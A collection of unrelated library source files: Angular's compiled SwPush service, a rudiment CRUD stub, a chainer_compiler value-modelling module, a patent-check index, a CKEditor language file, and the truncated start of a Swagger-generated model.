throw new Error('Unsubscribe failed!');
}
this.subscriptionChanges.next(null);
}));
});
return this.subscription.pipe(take(1), switchMap(doUnsubscribe)).toPromise();
}
/**
* @private
* @param {?} input
* @return {?}
*/
decodeBase64(input) { return atob(input); }
}
SwPush.ngInjectableDef = ɵngcc0.ɵɵdefineInjectable({ token: SwPush, factory: function SwPush_Factory(t) { return new (t || SwPush)(ɵngcc0.ɵɵinject(NgswCommChannel)); }, providedIn: null });
/*@__PURE__*/ ɵngcc0.ɵsetClassMetadata(SwPush, [{
type: Injectable
}], function () { return [{ type: NgswCommChannel }]; }, { constructor: [], sw: [], subscriptionChanges: [], messages: [], notificationClicks: [], subscription: [], pushManager: [], isEnabled: [], requestSubscription: [], unsubscribe: [], decodeBase64: [] });
/** @nocollapse */
SwPush.ctorParameters = () => [
{ type: NgswCommChannel }
];
if (false) {
/**
* Emits the payloads of the received push notification messages.
* @type {?}
*/
SwPush.prototype.messages;
/**
* Emits the payloads of the received push notification messages as well as the action the user
* interacted with. If no action was used the action property will be an empty string `''`.
*
* Note that the `notification` property is **not** a [Notification][Mozilla Notification] object
* but rather a
* [NotificationOptions](https://notifications.spec.whatwg.org/#dictdef-notificationoptions)
* object that also includes the `title` of the [Notification][Mozilla Notification] object.
*
* [Mozilla Notification]: https://developer.mozilla.org/en-US/docs/Web/API/Notification
* @type {?}
*/
SwPush.prototype.notificationClicks;
/**
* Emits the currently active
* [PushSubscription](https://developer.mozilla.org/en-US/docs/Web/API/PushSubscription)
* associated to the Service Worker registration or `null` if there is no subscription.
* @type {?}
*/
SwPush.prototype.subscription;
/**
* @type {?}
* @private
*/
SwPush.prototype.pushManager;
/**
* @type {?}
* @private
*/
SwPush.prototype.subscriptionChanges;
/**
* @type {?}
* @private
*/
SwPush.prototype.sw;
}
//# sourceMappingURL=data:application/json;charset=utf-8;base64,{"version":3,"sources":["/Users/mhartington/GitHub/ionic-conference-app/node_modules/@angular/service-worker/esm2015/src/push.js"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;;;AAoBA;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;CA+GC,sQAGC","file":"push.js","sourcesContent":["/**\n * @fileoverview added by tsickle\n * @suppress {checkTypes,constantProperty,extraRequire,missingOverride,missingReturn,unusedPrivateMembers,uselessCode} checked by tsc\n */\n/**\n * @license\n * Copyright Google Inc. All Rights Reserved.\n *\n * Use of this source code is governed by an MIT-style license that can be\n * found in the LICENSE file at https://angular.io/license\n */\nimport { Injectable } from '@angular/core';\nimport { NEVER, Subject, merge } from 'rxjs';\nimport { map, switchMap, take } from 'rxjs/operators';\nimport { ERR_SW_NOT_SUPPORTED, NgswCommChannel } from './low_level';\n/**\n * Subscribe and listen to push notifications from the Service Worker.\n *\n * \\@publicApi\n */\nexport class SwPush {\n    /**\n     * @param {?} sw\n     */\n    constructor(sw) {\n        this.sw = sw;\n        this.subscriptionChanges = new Subject();\n        if (!sw.isEnabled) {\n            this.messages = NEVER;\n            this.notificationClicks = NEVER;\n            this.subscription = NEVER;\n            return;\n        }\n        this.messages = this.sw.eventsOfType('PUSH').pipe(map((/**\n         * @param {?} message\n         * @return {?}\n         */\n        message => message.data)));\n        this.notificationClicks =\n            this.sw.eventsOfType('NOTIFICATION_CLICK').pipe(map((/**\n             * @param {?} message\n             * @return {?}\n             */\n            (message) => message.data)));\n        this.pushManager = this.sw.registration.pipe(map((/**\n         * @param {?} registration\n         * @return {?}\n         */\n        registration => registration.pushManager)));\n        /** @type {?} */\n        const workerDrivenSubscriptions = this.pushManager.pipe(switchMap((/**\n         * @param {?} pm\n         * @return {?}\n         */\n        pm => pm.getSubscription())));\n        this.subscription = merge(workerDrivenSubscriptions, this.subscriptionChanges);\n    }\n    /**\n     * True if the Service Worker is enabled (supported by the browser and enabled via\n     * `ServiceWorkerModule`).\n     * @return {?}\n     */\n    get isEnabled() { return this.sw.isEnabled; }\n    /**\n     * @param {?} options\n     * @return {?}\n     */\n    requestSubscription(options) {\n        if (!this.sw.isEnabled) {\n            return Promise.reject(new Error(ERR_SW_NOT_SUPPORTED));\n        }\n        /** @type {?} */\n        const pushOptions = { userVisibleOnly: true };\n        /** @type {?} */\n        let key = this.decodeBase64(options.serverPublicKey.replace(/_/g, '/').replace(/-/g, '+'));\n        /** @type {?} */\n        let applicationServerKey = new Uint8Array(new ArrayBuffer(key.length));\n        for (let i = 0; i < key.length; i++) {\n            applicationServerKey[i] = key.charCodeAt(i);\n        }\n        pushOptions.applicationServerKey = applicationServerKey;\n        return this.pushManager.pipe(switchMap((/**\n         * @param {?} pm\n         * @return {?}\n         */\n        pm => pm.subscribe(pushOptions))), take(1))\n            .toPromise()\n            .then((/**\n         * @param {?} sub\n         * @return {?}\n         */\n        sub => {\n            this.subscriptionChanges.next(sub);\n            return sub;\n        }));\n    }\n    /**\n     * @return {?}\n     */\n    unsubscribe() {\n        if (!this.sw.isEnabled) {\n            return Promise.reject(new Error(ERR_SW_NOT_SUPPORTED));\n        }\n        /** @type {?} */\n        const doUnsubscribe = (/**\n         * @param {?} sub\n         * @return {?}\n         */\n        (sub) => {\n            if (sub === null) {\n                throw new Error('Not subscribed to push notifications.');\n            }\n            return sub.unsubscribe().then((/**\n             * @param {?} success\n             * @return {?}\n             */\n            success => {\n                if (!success) {\n                    throw new Error('Unsubscribe failed!');\n                }\n                this.subscriptionChanges.next(null);\n            }));\n        });\n        return this.subscription.pipe(take(1), switchMap(doUnsubscribe)).toPromise();\n    }\n    /**\n     * @private\n     * @param {?} input\n     * @return {?}\n     */\n    decodeBase64(input) { return atob(input); }\n}\nSwPush.decorators = [\n    { type: Injectable }\n];\n/** @nocollapse */\nSwPush.ctorParameters = () => [\n    { type: NgswCommChannel }\n];\nif (false) {\n    /**\n     * Emits the payloads of the received push notification messages.\n     * @type {?}\n     */\n    SwPush.prototype.messages;\n    /**\n     * Emits the payloads of the received push notification messages as well as the action the user\n     * interacted with. If no action was used the action property will be an empty string `''`.\n     *\n     * Note that the `notification` property is **not** a [Notification][Mozilla Notification] object\n     * but rather a\n     * [NotificationOptions](https://notifications.spec.whatwg.org/#dictdef-notificationoptions)\n     * object that also includes the `title` of the [Notification][Mozilla Notification] object.\n     *\n     * [Mozilla Notification]: https://developer.mozilla.org/en-US/docs/Web/API/Notification\n     * @type {?}\n     */\n    SwPush.prototype.notificationClicks;\n    /**\n     * Emits the currently active\n     * [PushSubscription](https://developer.mozilla.org/en-US/docs/Web/API/PushSubscription)\n     * associated to the Service Worker registration or `null` if there is no subscription.\n     * @type {?}\n     */\n    SwPush.prototype.subscription;\n    /**\n     * @type {?}\n     * @private\n     */\n    SwPush.prototype.pushManager;\n    /**\n     * @type {?}\n     * @private\n     */\n    SwPush.prototype.subscriptionChanges;\n    /**\n     * @type {?}\n     * @private\n     */\n    SwPush.prototype.sw;\n}\n"]}
|
/**
* rudiment - CRUD resource manager
* https://github.com/gavinhungry/rudiment
*/
(function() {
'use strict';
module.exports = {
id: '_id',
api: {
init: function() {
var dbCursorProto = Object.getPrototypeOf(this._db.find());
dbCursorProto.toArray = dbCursorProto.toArray || dbCursorProto.exec;
},
getNextIndex: function() {
// resolve with number
},
isAdmissible: function(doc, props) {
// resolve with boolean
},
create: function(doc) {
// resolve with created document
},
find: function(props) {
// resolve with matching document(s)
},
read: function(id) {
// resolve with matching document
},
update: function(id, doc) {
// resolve with updated document
},
delete: function(id) {
// resolve with boolean
}
}
};
})();
|
import chainer
import chainer.functions as F
import chainer.links as L
import sys
import numpy as np
import collections
import ast
import gast
import inspect
import six
import types
import weakref
from chainer_compiler.elichika.parser import vevaluator
from chainer_compiler.elichika.parser import core
from chainer_compiler.elichika.parser import nodes
from chainer_compiler.elichika.parser import functions
from chainer_compiler.elichika.parser import utils
from chainer_compiler.elichika.parser import config
from chainer_compiler.elichika.parser import flags
from chainer_compiler.elichika.parser.functions import FunctionBase, UserDefinedFunction
fields = []
histories = []
# hashable function. key is python function, value is FuncValue
function_converters = {}
# unhashable function. key is str, value is FuncValue
builtin_function_converters = {}
# an array of convertter from python instance into Value
# first argument is module, second argument is python instance
instance_converters = []
# assign predefined values
predefined_value_assigners = [] # type: List[PredefinedValueAssigner]
class PredefinedValueAssigner:
def __init__(self):
self.target_type = None # type: type
def assign(self, target : 'Object'):
return
def apply_predefined_value_assigners(target_type : 'type', target : 'Object'):
for assigner in predefined_value_assigners:
if assigner.target_type != target_type:
continue
assigner.assign(target)
def create_ref_value_name_with_constant(value):
if isinstance(value, Object):
value = value.get_value()
if value.has_constant_value():
return '@C_' + str(value.get_constant_value())
return '@C_Unknown'
def reset_field_and_attributes():
global fields
fields = []
histories.clear()
def register_field(field: 'Field'):
fields.append(weakref.ref(field))
def unregister_field(field: 'Field'):
global fields
fields = [f for f in fields if f() != field]
def push_history(history_id: 'str'):
histories.append(history_id)
for field in fields:
o = field()
if o is not None:
o.push_history(history_id)
def pop_history():
histories.pop()
for field in fields:
o = field()
if o is not None:
o.pop_history()
def get_inputs() -> 'List[FieldInput]':
ret = []
for field in fields:
o = field()
if o is not None:
ret += o.get_inputs()
return ret
def get_outputs() -> 'List[FieldOutput]':
ret = []
for field in fields:
o = field()
if o is not None:
ret += o.get_outputs()
return ret
def compare(value1, value2):
if type(value1) != type(value2):
return False
else:
if isinstance(value1, NumberValue):
return value1.internal_value == value2.internal_value and value1.internal_value is not None
if isinstance(value1, StrValue):
return value1.internal_value == value2.internal_value and value1.internal_value is not None
else:
return False
def parse_instance(default_module, name, instance, self_instance=None, from_member = False, root_graph : 'graphs.Graph' = None) -> "Object":
for converter in instance_converters:
ret = converter(default_module, instance)
if ret is not None:
return Object(ret)
#if inspect.ismethod(instance) or inspect.isfunction(instance) or isinstance(instance, np.ufunc):
if isinstance(instance, collections.Hashable):
if instance in function_converters.keys():
func = function_converters[instance]
return Object(func)
# need to check whether is value bool before check whether is value int
if isinstance(instance, bool):
return Object(BoolValue(instance))
if isinstance(instance, int):
return Object(NumberValue(instance))
if isinstance(instance, np.int32):
return Object(NumberValue(instance))
if isinstance(instance, np.int64):
return Object(NumberValue(instance))
if isinstance(instance, float):
return Object(NumberValue(instance))
if isinstance(instance, np.float32):
return Object(NumberValue(instance))
if isinstance(instance, np.float64):
return Object(NumberValue(instance))
if isinstance(instance, str):
return Object(StrValue(instance))
if instance is inspect._empty:
return None
if inspect.ismethod(instance):
func = UserDefinedFunction(instance)
return Object(FuncValue(func, self_instance, default_module))
if inspect.isfunction(instance):
func = UserDefinedFunction(instance)
if from_member:
return Object(FuncValue(func, self_instance, default_module))
else:
return Object(FuncValue(func, None, default_module))
if inspect.isclass(instance):
func = functions.UserDefinedClassConstructorFunction(instance)
return Object(FuncValue(func, None, default_module))
if isinstance(instance, list):
if root_graph is None:
value_in_tuple = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
ret = ListValue(value_in_tuple)
else:
value_in_tuple = []
vs = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
value = o.get_value()
if isinstance(value, TupleValue):
assert(False)
if isinstance(value, ListValue):
assert(False)
vs.append(value)
node = nodes.NodeGenerate('List', vs)
ret = ListValue(value_in_tuple)
node.set_outputs([ret])
root_graph.add_initial_node(node)
ret.estimate_type()
return Object(ret)
if isinstance(instance, dict):
keys = []
values = []
for key, value in instance.items():
keys.append(parse_instance(default_module, '', key))
values.append(parse_instance(default_module, '', value))
ret = DictValue(keys, values)
return Object(ret)
if isinstance(instance, tuple) and 'Undefined' in instance:
shape = list(instance)
shape = -1 if shape == 'Undefined' else shape
tensorValue = TensorValue()
tensorValue.shape = tuple(shape)
return Object(tensorValue)
if isinstance(instance, tuple):
if root_graph is None:
value_in_tuple = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
return Object(TupleValue(value_in_tuple))
else:
value_in_tuple = []
vs = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
value = o.get_value()
if isinstance(value, TupleValue):
assert(False)
if isinstance(value, ListValue):
assert(False)
vs.append(value)
node = nodes.NodeGenerate('Tuple', vs)
ret = TupleValue(value_in_tuple)
node.set_outputs([ret])
root_graph.add_initial_node(node)
return Object(ret)
if isinstance(instance, np.ndarray):
tensorValue = TensorValue(instance)
tensorValue.value = instance
tensorValue.shape = instance.shape
return Object(tensorValue)
if isinstance(instance, chainer.Variable):
tensorValue = TensorValue(instance.data)
tensorValue.value = instance.data
tensorValue.shape = instance.data.shape
return Object(tensorValue)
if instance == inspect._empty:
return Object(NoneValue())
if instance is None:
return Object(NoneValue())
if utils.is_disabled_module(instance):
return None
if inspect.ismodule(instance):
value = ModuleValue(instance)
return Object(value)
module = Object(ModuleValue(sys.modules[instance.__module__]))
model_inst = UserDefinedInstance(module, instance, None)
return Object(model_inst)
class FieldInput:
def __init__(self):
self.input_value = None
self.field = None
self.name = None
self.value = None
self.obj = None
class FieldOutput:
def __init__(self):
self.field = None
self.name = None
self.obj = None
self.old_value = None
self.value = None
class FieldAttributeCollection():
def __init__(self, id: 'str', parent: 'FieldAttributeCollection'):
self.id = id
self.parent = parent
self.attributes = {}
self.inputs = {}
def try_get_attribute(self, key: 'str'):
if key in self.attributes.keys():
return self.attributes[key]
# search from parent
if self.parent is None:
return None
parent_attribute = self.parent.try_get_attribute(key)
if parent_attribute is None:
return None
attribute = Attribute(key)
attribute.parent = parent_attribute.parent
# instance or func
if isinstance(parent_attribute.get_obj().get_value(), Instance) or isinstance(parent_attribute.get_obj().get_value(), FuncValue) or isinstance(parent_attribute.get_obj().get_value(), ModuleValue):
attribute.revise(parent_attribute.get_obj())
self.attributes[key] = attribute
return attribute
# input
attribute.revise(parent_attribute.get_obj())
self.attributes[key] = attribute
self.inputs[attribute] = (attribute.get_obj(), attribute.get_obj().get_value(
), attribute.get_obj().get_value(), attribute.get_obj().get_value())
return attribute
def pop_history(self):
for att, input in self.inputs.items():
input[0].revise(input[1])
self.inputs.clear()
def get_inputs(self) -> 'List[FieldInput]':
'''
return [(input value, copied input value)]
'''
ret = []
for att, input in self.inputs.items():
fi = FieldInput()
fi.name = att.name
fi.field = att.parent
fi.input_value = input[2]
fi.value = input[3]
fi.obj = input[0]
ret.append(fi)
return ret
def get_outputs(self) -> 'List[FieldOutput]':
'''
return [(field,key,value)]
'''
ret = []
for key, att in self.attributes.items():
# has ref? (it causes with compile error in almost cases)
if not att.has_obj():
continue
# instance or func
if isinstance(att.get_obj().get_value(), Instance) or isinstance(att.get_obj().get_value(), FuncValue) or isinstance(att.get_obj().get_value(), ModuleValue):
continue
if (not (att in self.inputs.keys())) or att.get_obj() != self.inputs[att][0] or att.get_obj().get_value() != self.inputs[att][1]:
fo = FieldOutput()
fo.name = att.name
fo.field = att.parent
fo.obj = att.get_obj()
if att in self.inputs.keys():
fo.old_value = self.inputs[att][1]
fo.value = att.get_obj().get_value()
ret.append(fo)
return ret
class Field():
def __init__(self):
self.collection = FieldAttributeCollection('', None)
histories_ = histories.copy()
histories_.reverse()
for history in histories_:
collection = FieldAttributeCollection(history, self.collection)
self.collection = collection
self.module = None
self.id = utils.get_guid()
register_field(self)
def dispose(self):
'''
dispose this field because of exit function
don't touch after dispose
'''
self.collection = FieldAttributeCollection('', None)
unregister_field(self)
def set_module(self, module):
self.module = module
def get_field(self) -> 'Field':
return self
def has_attribute(self, key) -> 'Boolean':
c = self.collection
while c is not None:
if key in c.attributes.keys():
return True
c = c.parent
return False
def try_get_attribute(self, key : 'str') -> 'Attribute':
return self.collection.try_get_attribute(key)
def get_attribute(self, key: 'str', root_graph : 'graphs.Graph' = None, from_module=False) -> 'Attribute':
attribute = self.collection.try_get_attribute(key)
if attribute is not None:
return attribute
# search an attribute from a module
if self.module is not None and from_module and self.module.try_get_and_store_obj(key, root_graph):
attribute = self.module.attributes.get_attribute(key, root_graph)
if attribute is not None:
return attribute
attribute = Attribute(key)
attribute.parent = self
self.collection.attributes[key] = attribute
return attribute
def push_history(self, history_id: 'str'):
collection = FieldAttributeCollection(history_id, self.collection)
self.collection = collection
def pop_history(self):
self.collection.pop_history()
self.collection = self.collection.parent
if self.collection is None:
self.collection = FieldAttributeCollection('', None)
def get_inputs(self):
return self.collection.get_inputs()
def get_outputs(self):
return self.collection.get_outputs()
def set_predefined_obj(self, key, obj):
collections = []
c = self.collection
while True:
collections.append(c)
c = c.parent
if c is None:
break
collections.reverse()
old_value = None
value = None
for collection in collections:
attribute = Attribute(key)
attribute.parent = self
attribute.revise(obj)
collection.attributes[key] = attribute
if isinstance(obj.get_value(), Instance) or isinstance(obj.get_value(), FuncValue) or isinstance(obj.get_value(), ModuleValue):
continue
collection.inputs[attribute] = (attribute.get_obj(), attribute.get_obj(
).get_value(), attribute.get_obj().get_value(), attribute.get_obj().get_value())
# if old_value is not None:
# collection.inputs[attribute] = (attribute.get_obj(), attribute.get_obj().get_value(), old_value, value)
#old_value = obj.get_value()
#value = functions.generate_copied_value(old_value)
#obj = Object(value)
class Attribute:
def __init__(self, name: 'str'):
self.name = name
self.obj = None
self.parent = None # type: Field
# if it is non-volatile, an object in this attribute is saved after running
self.is_non_volatile = False
def revise(self, obj: 'Object'):
assert(isinstance(obj, Object))
# assgin name to the object
obj.name = utils.create_obj_value_name_with_attribute(
self.name, obj.name)
obj.get_value().name = utils.create_obj_value_name_with_attribute(
self.name, obj.get_value().name)
self.obj = obj
def has_obj(self):
return self.obj != None
def get_obj(self):
assert self.has_obj()
return self.obj
def make_subscript_attribute(self, subscript: 'Object', graph: 'Graph'):
return SubscriptAttribute(self.name+"subscript"+str(utils.get_guid()), self, subscript, graph)
def __str__(self):
return self.name
class SubscriptAttribute(Attribute):
def __init__(self, name: 'str', parent: 'Attribute', subscript: 'Object', graph: 'Graph'):
super().__init__(name)
self.attribute_parent = parent
self.subscript = subscript
self.graph = graph
def revise(self, obj: 'Object', update_parent = True):
super().revise(obj)
if not update_parent:
return
assert isinstance(self.attribute_parent, Attribute)
target_value = utils.try_get_value(self.attribute_parent, 'subscript', -1)
revision_value = utils.try_get_value(self.obj, 'subscript', -1)
subscript_value = utils.try_get_value(self.subscript, 'subscript', -1)
if isinstance(subscript_value, TupleValue):
# ex. x[1,2]
if subscript_value.has_constant_value():
subscripts = [utils.try_get_value(x, 'subscript', -1) for x in subscript_value.get_constant_value()]
else:
if config.show_warnings:
assert False, "This subscript is not supported."
else:
# ex. x[1]
subscripts = [subscript_value]
node = nodes.NodeSetItem(target_value, subscripts, revision_value)
ret_value = functions.generate_value_with_same_type(target_value)
node.set_outputs([ret_value])
self.graph.add_node(node)
self.attribute_parent.revise(Object(ret_value))
class Object():
def __init__(self, value: 'Value'):
self.name = ""
self.value = value
self.id = utils.get_guid()
self.attributes = Field()
self.value.apply_to_object(self)
self.in_container = False
def get_field(self) -> 'Field':
return self.attributes
def get_value(self) -> 'Value':
return self.value
def revise(self, value):
self.value = value
def try_get_and_store_obj(self, name: 'str', root_graph : 'graphs.Graph') -> 'Object':
attribute = self.attributes.try_get_attribute(name)
if attribute is not None and attribute.has_obj():
return attribute.get_obj()
obj = self.value.try_get_obj(name, self, root_graph)
if obj is None:
return None
self.attributes.set_predefined_obj(name, obj)
return obj
class Value():
def __init__(self):
self.name = ""
self.generator = None
self.internal_value = None
self.dtype = None
self.id = utils.get_guid()
# this actual value is not important, but type is required as dummy value
self.is_dummy_value = False
def has_constant_value(self) -> 'bool':
return self.internal_value is not None
def get_constant_value(self):
return self.internal_value
def is_not_none_or_any_value(self):
return False
def is_iteratable(self):
return False
def is_hashable(self):
return False
def get_iterator(self) -> 'Object':
return None
def apply_to_object(self, obj: 'Object'):
'''
register functions to an object
this function is only called when an object is generated
'''
return None
def encode(self):
if not self.is_hashable():
assert(False)
return ""
def try_get_obj(self, name: 'str', inst: 'Object', root_graph : 'graphs.Graph') -> 'Object':
return None
def __str__(self):
return self.name
class NoneValue(Value):
def __init__(self):
super().__init__()
def has_constant_value(self) -> 'bool':
return True
def is_hashable(self):
return True
def encode(self):
ret = super().encode()
ret += 'None'
ret += str(hash(None))
return ret
def get_constant_value(self):
return None
def __str__(self):
return self.name + '({})'.format('None')
class UnknownValue(Value):
def __init__(self):
super().__init__()
def __str__(self):
return self.name + '(Un)'
class NumberValue(Value):
def __init__(self, number):
super().__init__()
self.internal_value = number
self.dtype = None
if self.internal_value is not None:
self.dtype = np.array(self.internal_value).dtype
if not config.float_restrict and self.dtype == np.float64:
self.dtype = np.float32
def is_not_none_or_any_value(self):
return True
def is_hashable(self):
return self.has_constant_value()
def encode(self):
ret = super().encode()
ret += 'Num'
ret += str(hash(self.internal_value))
return ret
def __str__(self):
if self.internal_value == None:
return self.name + '(N.{})'.format('Any')
return self.name + '(N.{})'.format(self.internal_value)
class StrValue(Value):
def __init__(self, string):
super().__init__()
self.internal_value = string
def is_not_none_or_any_value(self):
return True
def is_hashable(self):
return self.has_constant_value()
def encode(self):
ret = super().encode()
ret += 'Str'
ret += str(hash(self.internal_value))
return ret
def __str__(self):
if self.internal_value == None:
return self.name + '(S.{})'.format('Any')
return self.name + '(S.{})'.format(self.internal_value)
class BoolValue(Value):
def __init__(self, b):
super().__init__()
self.internal_value = b
def is_not_none_or_any_value(self):
return True
def is_hashable(self):
return self.has_constant_value()
def encode(self):
ret = super().encode()
ret += 'Num'
ret += str(hash(self.internal_value))
return ret
def __str__(self):
if self.internal_value == None:
return self.name + '(B.{})'.format('Any')
return self.name + '(B.{})'.format(self.internal_value)
class RangeValue(Value):
def __init__(self):
super().__init__()
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def get_iterator(self) -> 'Object':
return Object(NumberValue(None))
def __str__(self):
return self.name + '(R)'
class TupleValue(Value):
def __init__(self, values=None):
super().__init__()
self.internal_value = values
self.vtype = None # type: Type
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def is_hashable(self):
self.estimate_type()
return self.has_constant_value() and self.vtype is not None
def encode(self):
ret = super().encode()
ret += 'Tuple'
tup = tuple(v.get_value().internal_value for v in self.internal_value)
ret += str(hash(tup))
return ret
def get_iterator(self) -> 'Object':
if self.vtype is None:
return None
v = self.vtype()
if self.dtype is not None:
v.dtype = self.dtype
return Object(v)
def estimate_type(self):
if self.internal_value is None:
return
self.vtype = None
self.dtype = None
for v in self.internal_value:
if self.vtype is None:
self.vtype = type(v.get_value())
self.dtype = v.get_value().dtype
else:
if self.vtype != type(v.get_value()):
self.vtype = None
self.dtype = None
return
if self.dtype != v.get_value().dtype:
self.dtype = None
def __str__(self):
return self.name + '(Tp{})'
class FuncValue(Value):
def __init__(self, func: 'functions.FunctionBase', obj: 'Object', module : 'Object' = None):
super().__init__()
self.func = func
self.internal_value = func # TODO(rchours): So that has_constant_type() succeeds on FuncValue.
self.obj = obj
self.module = module
def is_not_none_or_any_value(self):
return True
def __str__(self):
return self.name + '(F)'
class ListValue(Value):
def __init__(self, values=None):
super().__init__()
self.internal_value = values
self.dtype = None
self.vtype = None # type: Type
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def get_iterator(self) -> 'Object':
if self.vtype is None:
return None
v = self.vtype()
if self.dtype is not None:
v.dtype = self.dtype
return Object(v)
def __filter_internal_values(self):
return [v for v in self.internal_value if v is not None and not isinstance(v.get_value(), NoneValue)]
def estimate_type(self):
if self.internal_value is None:
return
internal_values = self.__filter_internal_values()
self.vtype = None
self.dtype = None
for v in internal_values:
if self.vtype is None:
self.vtype = type(v.get_value())
self.dtype = v.get_value().dtype
else:
if self.vtype != type(v.get_value()):
self.vtype = None
self.dtype = None
return
if self.dtype != v.get_value().dtype:
self.dtype = None
def append(self, v):
if self.internal_value is None:
if self.vtype is None and not isinstance(v.get_value(), NoneValue):
self.vtype = type(v.get_value())
self.dtype = v.get_value().dtype
else:
if self.vtype != type(v.get_value()):
self.vtype = None
self.dtype = None
return
if self.dtype != v.get_value().dtype:
self.dtype = None
else:
self.internal_value.append(v)
self.estimate_type()
def apply_to_object(self, obj: 'Object'):
apply_predefined_value_assigners(type(ListValue), obj)
def __str__(self):
return self.name + '(L)'
class DictValue(Value):
def __init__(self, keys=None, values=None):
super().__init__()
self.internal_keys = {}
self.internal_values = Field()
self.key_dtype = None
self.key_vtype = None # type: Type
for key, value in zip(keys, values):
if key.get_value().is_hashable():
key_hash = key.get_value().encode()
self.internal_values.get_attribute(key_hash).revise(value)
self.internal_keys[key_hash] = key
else:
assert False # Non hashable types not supported
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return False
# TODO(rchouras): Add iterator for dictionary keys.
# def get_iterator(self) -> 'Object':
# return
def apply_to_object(self, obj: 'Object'):
apply_predefined_value_assigners(type(ListValue), obj)
'''
keys_func = Object(
FuncValue(functions_builtin.KeysFunction(self), obj, None))
obj.attributes.get_attribute('keys').revise(keys_func)
values_func = Object(
FuncValue(functions_builtin.ValuesFunction(self), obj, None))
obj.attributes.get_attribute('values').revise(values_func)
'''
def __str__(self):
return self.name + '(D)'
class TensorValue(Value):
def __init__(self, value = None):
super().__init__()
self.shape = ()
self.internal_value = value
self.value = None # not used?
self.dtype = None
if self.internal_value is not None:
self.dtype = np.array(self.internal_value).dtype
if not config.float_restrict and self.dtype == np.float64:
self.dtype = np.float32
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def get_iterator(self) -> 'Object':
v = TensorValue()
v.dtype = self.dtype
return Object(v)
def apply_to_object(self, obj: 'Object'):
apply_predefined_value_assigners(type(TensorValue), obj)
def __str__(self):
return self.name + '(T.{})'.format(self.shape)
class Type(Value):
def __init__(self, name: 'str'):
super().__init__()
self.name = name
def is_not_none_or_any_value(self):
return True
class ModuleValue(Value):
def __init__(self, module):
super().__init__()
self.internal_module = module
def try_get_obj(self, name: 'str', inst: 'Object', root_graph : 'graphs.Graph') -> 'Object':
if self.internal_module == six.moves:
# Calling `inspect.getmembers` for `six.moves` causes
# eager load for potentially non-existent libraries such
# as tkinter or gdbm. To workaround this issue, we
# retrieve only whitelisted members in `six.moves`.
# TODO(hamaji): Figure out a better workaround.
safe_keys = ['range', 'xrange', 'map', 'filter', 'zip']
members = [(k, getattr(self.internal_module, k)) for k in safe_keys]
else:
members = inspect.getmembers(self.internal_module)
members_dict = {}
for member in members:
members_dict[member[0]] = member[1]
if not (name in members_dict.keys()):
if name in builtin_function_converters.keys():
v = Object(builtin_function_converters[name])
return v
return None
attr_v = members_dict[name]
dummy_flags_members_dict = {}
dummy_flags_members = inspect.getmembers(flags)
for member in dummy_flags_members:
if isinstance(member[1], types.FunctionType):
dummy_flags_members_dict[member[0]] = member[1]
if name in dummy_flags_members_dict.keys():
v = Object(builtin_function_converters[name])
return v
v = parse_instance(inst, name, attr_v, None)
return v
class Instance(Value):
def __init__(self, module: 'Object', inst, classinfo):
super().__init__()
self.inst = inst
self.func = None
self.module = module
self.classinfo = classinfo
def is_not_none_or_any_value(self):
return True
class UserDefinedInstance(Instance):
def __init__(self, module: 'Object', inst, classinfo):
super().__init__(module, inst, classinfo)
def try_get_obj(self, name: 'str', inst: 'Object', root_graph : 'graphs.Graph') -> 'Object':
obj = None
if self.inst is not None:
if not hasattr(self.inst, name):
return None
attr_v = getattr(self.inst, name)
obj = parse_instance(self.module, name, attr_v, inst, root_graph=root_graph)
else:
members = inspect.getmembers(self.classinfo)
members_dict = {}
for member in members:
members_dict[member[0]] = member[1]
if not (name in members_dict.keys()):
return None
obj = parse_instance(self.module, name, members_dict[name], inst, from_member=True, root_graph=root_graph)
return obj
def apply_to_object(self, obj: 'values.Object'):
super().apply_to_object(obj)
enter_func = obj.try_get_and_store_obj('__enter__', None)
if enter_func is not None:
obj.get_field().get_attribute('__enter__').revise(enter_func)
exit_func = obj.try_get_and_store_obj('__exit__', None)
if exit_func is not None:
obj.get_field().get_attribute('__exit__').revise(exit_func)
getitem_func = obj.try_get_and_store_obj('__getitem__', None)
if getitem_func is not None:
obj.get_field().get_attribute('__getitem__').revise(getitem_func)
|
import wgPatentCheck from './wgPatent'
import syPatentCheck from './syPatent'
import inventPatentCheck from './inventPatent'
export default {
wgPatentCheck,
syPatentCheck,
inventPatentCheck
}
|
/*
Copyright (c) 2003-2015, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang("placeholder","eu",{title:"Leku-marka Aukerak",toolbar:"Leku-marka sortu",name:"Placeholder Name",invalidName:"The placeholder can not be empty and can not contain any of following characters: [, ], <, >",pathName:"placeholder"});
|
/*
* SeminarCatalog API
* Rest API for SeminarCatalog Administration
*
* OpenAPI spec version: 1.0.0
* Contact: info@databay.de
*
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen.git
*
* Swagger Codegen version: 2.4.12
*
* Do not edit the class manually.
*/
import {ApiClient} from '../ApiClient';
/**
* The AllocationWaitingList model module.
* @module model/AllocationWaitingList
* @version 1.0.0
*/
export class AllocationWaitingList {
/**
* Constructs a new <code>AllocationWaitingList</code>.
* @alias module:model/AllocationWaitingList
* @class
*/
constructor() {
}
/**
* Constructs a <code>AllocationWaitingList</code> from a plain JavaScript object, optionally creating a new instance.
* Copies all relevant properties from <code>data</code> to <code>obj</code> if supplied or a new instance if not.
* @param {Object} data The plain JavaScript object bearing properties of interest.
* @param {module:model/AllocationWaitingList} obj Optional instance to populate.
* @return {module:model/AllocationWaitingList} The populated <code>AllocationWaitingList</code> instance.
*/
static constructFromObject(data, obj) {
if (data) {
obj = obj || new AllocationWaitingList();
if (data.hasOwnProperty('_syncFields'))
